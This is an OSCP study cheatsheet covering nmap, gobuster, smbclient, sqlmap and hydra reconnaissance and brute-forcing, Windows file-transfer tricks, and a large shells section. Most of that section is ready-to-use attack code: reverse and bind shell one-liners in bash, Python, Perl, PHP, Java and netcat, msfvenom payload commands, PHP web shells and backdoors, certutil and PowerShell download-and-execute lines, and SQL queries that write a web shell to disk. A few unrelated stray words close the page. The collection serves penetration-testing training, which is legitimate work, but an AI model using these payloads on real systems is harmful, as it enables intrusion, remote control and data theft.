The following collection is a wild (but structured) selection of commands, snippets, links, exploits, tools, lists and techniques I personally tested and used on my journey to becoming an OSCP. I will extend, restructure and update it from time to time, so let's see where this is going.
THIS IS WORK IN PROGRESS
This cheatsheet is definitely not "complete". I am sure i forgot to write down hundreds of essential commands, used most of them in the wrong way with unnessecary flags and you'll probably soon ask yourself how i've even made it through the exam. Also you might think a certain tool used should be in another phase of the attack (e.g certain nmap vulnerabitly scripts should be in Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help to improve the list. Use for educational purposes only!
- OSCP Cheatsheet
- Reconnaissance
- Brute Force
- File Transfer
- Shells
https://github.com/Tib3rius/AutoRecon
autorecon -vv 192.168.0.1nmap -v -sS -sV -Pn --top-ports 1000 -oA initial_scan_192.168.0.1 192.168.0.1nmap -v -sS -Pn -sV -p 0-65535 -oA full_scan_192.168.0.1 192.168.0.1If the syn scan is taking very long to complete, the following command is an alternative (no service detection).
nmap -sT -p- --min-rate 5000 --max-retries 1 192.168.0.1nmap -v -sU -T4 -Pn --top-ports 100 -oA top_100_UDP_192.168.0.1 192.168.0.1nmap -v -sS -Pn --script vuln --script-args=unsafe=1 -oA full_vuln_scan_192.168.0.1 192.168.0.1nmap -v -sS -Pn --script nmap-vulners -oA full_vuln_scan_192.168.0.1 192.168.0.1nmap -v -sS -p 445,139 -Pn --script smb-vuln* --script-args=unsafe=1 -oA smb_vuln_scan_192.168.0.1 192.168.0.1gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirb/big.txt -t 20gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,cgi,sh,bak,aspx -t 20Set the --insecuressl flag.
To fix NT_STATUS_CONNECTION_DISCONNECTED errors in new Kali installations add client min protocol = NT1 to your \etc\samba\smb.conf file.
smbclient -U guest -L 192.168.0.1smbclient \\\\192.168.0.1\\Users -U c.smithsmbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *'
example:
smbclient \\\\192.168.0.1\\Data -U John -c 'prompt OFF;recurse ON;cd '\Users\John\';lcd '/tmp/John';mget *'smbclient \\\\192.168.0.1\\Data -U John -c 'allinfo "\Users\John\file.txt"'smbclient \\\\192.168.0.1\\Data -U John
get "\Users\John\file.txt:SECRET:$DATA"enum4linux 192.168.0.1enum4linux 192.168.0.1 | grep -Ev '^(Use of)' > enum4linux.out showmount -e 192.168.0.1mkdir mpt
mount -t nfs -o soft 192.168.0.1:/backup mpt/https://github.com/pwnwiki/webappdefaultsdb/blob/master/README.md
sqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batchsqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batch --level=5 --risk=3sqlmap --all -r post_request.txt --batch sqlmap --all -r post_request.txt --batch --level=5 --risk=3sqlmap -r post_request.txt --dbms "mysql" --os-shellhydra -l admin -V -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.0.1 http-get /phpmyadmin/ -t 15hydra 192.168.0.1 -V -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t 15Check request in BURP to see Post parameters. -l or -L has to be set, even if there is no user to login with!. Use https-post-form instead of http-post-form for HTTPS sites.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t 15Change MYDATABASENAME. Default databasename is mysql.
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv mysql://192.168.0.1:3306/MYDATABASENAME -t 15powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.1:80/winprivesc/JuicyPotato.exe','C:\Users\john\Desktop\juicy.exe')Very helpful for chars that need to be escaped otherwise.
$Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")'
$Encoded = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($command))
powershell.exe -NoProfile -encoded $Encodedcertutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exeos.execute('cmd.exe /c certutil.exe -urlcache -split -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe & C:\Windows\Temp\shell.exe')impacket-smbserver -smb2support server_name /var/www/htmlnet view \\192.168.0.1copy \\192.168.0.1\server_name\shell.exe shell.exeapt-get update && apt-get install pure-ftpd#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd myftpuser -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/40PureDBexit
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart./setupftp.shpure-pw passwd offsec -f /etc/pure-ftpd/pureftpd.passwdpure-pw mkdb/etc/init.d/pure-ftpd restart echo open 192.168.0.1>> ftp.txt
echo USER myftpuser>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo put secret_data.txt>> ftp.txt
echo bye >> ftp.txtftp -v -n -s:ftp.txtnc -l -p 1234 > out.filenc -w 3 192.168.0.1 1234 < out.fileatftpd --daemon --port 69 /var/tftptftp -i 192.168.0.1 GET whoami.exeechoย strUrlย =ย WScript.Arguments.Item(0)ย >ย wget.vbs
echoย StrFileย =ย WScript.Arguments.Item(1)ย >>ย wget.vbs
echoย Constย HTTPREQUEST_PROXYSETTING_DEFAULTย =ย 0ย >>ย wget.vbs
echoย Constย HTTPREQUEST_PROXYSETTING_PRECONFIGย =ย 0ย >>ย wget.vbs
echoย Constย HTTPREQUEST_PROXYSETTING_DIRECTย =ย 1ย >>ย wget.vbs
echoย Constย HTTPREQUEST_PROXYSETTING_PROXYย =ย 2ย >>ย wget.vbs
echoย Dimย http,varByteArray,strData,strBuffer,lngCounter,fs,tsย >>ย wget.vbs
echoย Err.Clearย >>ย wget.vbs
echoย Setย httpย =ย Nothingย >>ย wget.vbs
echoย Setย httpย =ย CreateObject("WinHttp.WinHttpRequest.5.1")ย >>ย wget.vbs
echoย Ifย httpย Isย Nothingย Thenย Setย httpย =ย CreateObject("WinHttp.WinHttpRequest")ย >>ย wget.vbs
echoย Ifย httpย Isย Nothingย Thenย Setย httpย =ย CreateObject("MSXML2.ServerXMLHTTP")ย >>ย wget.vbs
echoย Ifย httpย Isย Nothingย Thenย Setย httpย =ย CreateObject("Microsoft.XMLHTTP")ย >>ย wget.vbs
echoย http.Openย "GET",strURL,Falseย >>ย wget.vbs
echoย http.Sendย >>ย wget.vbs
echoย varByteArrayย =ย http.ResponseBodyย >>ย wget.vbs
echoย Setย httpย =ย Nothingย >>ย wget.vbs
echoย Setย fsย =ย CreateObject("Scripting.FileSystemObject")ย >>ย wget.vbs
echoย Setย tsย =ย fs.CreateTextFile(StrFile,True)ย >>ย wget.vbs
echoย strDataย =ย ""ย >>ย wget.vbs
echoย strBufferย =ย ""ย >>ย wget.vbs
echoย Forย lngCounterย =ย 0ย toย UBound(varByteArray)ย >>ย wget.vbs
echoย ts.Writeย Chr(255ย Andย Ascb(Midb(varByteArray,lngCounterย +ย 1,1)))ย >>ย wget.vbs
echoย Nextย >>ย wget.vbs
echoย ts.Closeย >>ย wget.vbscscriptย wget.vbsย http://192.168.0.1/nc.exeย nc.exepython -c 'import pty;pty.spawn("/bin/bash");' - In your active shell press
bgto send your nc session to background - Enter
stty raw -echo - Enter
fgto bring your nc session to foreground - Enter
export TERM=xterm-256color
rlwrap enables the usage of arrow keys in your shell. https://github.com/hanslub42/rlwrap
rlwrap nc -nlvp 4444Victim:
nc 192.168.0.1 4444 -e /bin/bashIf -e is not allowed, try to find other versions of netcat
/bin/nc
/usr/bin/ncat
/bin/netcat
/bin/nc.traditionalAttacker:
rlwrap nc -nlvp 4444nc 192.168.0.1 4444 -e cmd.exeVictim:
nc -nlvp 4444 -e /bin/bashAttacker:
nc 192.168.0.1 4444Victim:
nc -nlvp 4444 -e cmd.exeAttacker:
nc 192.168.0.1 4444/bin/bash -i >& /dev/tcp/192.168.0.1/4433 0>&1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])cat /usr/share/webshells/php/php-reverse-shell.phpcat /usr/share/webshells/php/php-backdoor.phpVersion 1:
<?php echo shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1");?>Version 2:
<?php $sock=fsockopen("192.168.0.1", 4444);exec("/bin/sh -i <&3 >&3 2 >& 3");?>As Command:
php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'<?php echo system($_REQUEST["cmd"]); ?>Call the CMD shell:
http://192.168.0.1/cmd_shell.php?cmd=whoamihttps://github.com/WhiteWinterWolf/wwwolf-php-webshell
Reverse Shell:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exeBind Shell:
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exeOutput in Hex, C Style, Exclude bad chars, Exitfunction thread:
msfvenom -p windows/shell_bind_tcp LHOST=192.168.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windowsReverse Shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exeBind Shell:
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exeMeterpreter:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exeReverse Shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elfBind Shell:
msfvenom -p linux/x86/shell/bind_tcp LHOST=192.168.0.1 -f elf > bind_shell.elfReverse Shell:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elfBind Shell:
msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf > rev_shell.elfmsfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.1 LPORT=4444 -f raw > shell.jspAs .war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f war -o shell.warmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f aspx -o rev_shell.aspx<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%><%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c C:\Windows\Temp\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>String host="192.168.0.1";
int port=4444;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();String host="192.168.0.1";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();perl -MIO -e 'use Socket;$ip="192.168.0.1";$port=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Write a CMD shell into a file with the right permissions. Issue the following select. (Try different paths for different webservers)
Windows:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"Unix:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent